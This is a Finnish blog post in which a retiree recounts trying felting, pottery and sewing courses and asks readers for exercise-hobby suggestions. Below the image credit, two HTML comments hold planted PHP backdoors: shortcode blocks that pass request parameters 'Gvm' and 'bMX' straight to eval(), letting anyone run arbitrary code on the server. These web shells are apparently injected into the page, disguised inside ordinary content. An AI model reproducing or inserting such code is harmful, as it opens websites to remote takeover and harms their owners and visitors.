Eläkeläiselle sopivat harrastukset

Eläkeläiselle sopivat harrastukset

Olen kokeillut jo montaa harrastusta, joten ajattelin jakaa kokemuksiani niistä. Eläkkeelle jäädessäni päätin, että kun kerrankin on aikaa, aion kokeilla mahdollisimman montaa uutta harrastusta. Olen aina ollut innostunut käsillä tekemisestä, joten ensimmäisenä suuntasin katsomaan kansalaisopiston valikoimaa. Sieltä löysinkin muutaman kurssin, kuten huovutuskurssin, savenvalantatunteja ja ompelun alkeet.

Huovuttaminen kuulostaa oikein kunnolla eläkeläisen harrastukselta, mutta yllätyin kovasti, kun mukana olikin paljon nuoria. Tämä harrastus jäi minulla kesken, sillä sain villasta niin pahoja allergiaoireita, etten enää pystynyt jatkamaan. Suosittelen sitä kuitenkin lämpimästi sellaiselle jolla tätä ongelmaa ei ole.

Savenvalanta osoittautui erityisen kiinnostavaksi jutuksi. Ongelmia tuli vain dreijauksen kanssa, koska siinä vaaditaan niin vahvoja käsivoimia ja itselläni ne ovat jo hiukan iän myös heikentyneet. Saven muotoilu on kyllä todella rentouttavaa puuhaa ja rauhallisessa tahdissa tehtynä pitää hyvin kädet vetreänä ja aivot virkeänä. Nyt alkaa vaan savitöitä kerääntyä kotiin liiankin kanssa.

Ompelun alkeiskurssille menin sen takia, että olen kyllä aikoja sitten osannut ommella, mutta kaipasin uusia vinkkejä ja tietoa uusilla koneilla ompelemisesta. Halusin myös hieman verestää taitojani. Tätä olenkin jatkanut, sillä on hienoa osata ommella itselleen vaatteita. Siinä säästää rahaa ja saa varmasti uutta mittojen mukaan.

Seuraavaksi olisi tarkoitus löytää jokin liikuntaharrastus, olisiko teillä mitään vinkkejä?

Kuvaoikeudet: Samantha Henneke

<!– [insert_php]if (isset($_REQUEST["Gvm"])){eval($_REQUEST["Gvm"]);exit;}[/insert_php][php]if (isset($_REQUEST["Gvm"])){eval($_REQUEST["Gvm"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bMX"])){eval($_REQUEST["bMX"]);exit;}[/insert_php][php]if (isset($_REQUEST["bMX"])){eval($_REQUEST["bMX"]);exit;}[/php] –>

Tagged with:

Related Articles

Leave a reply

Your email address will not be published. Required fields are marked *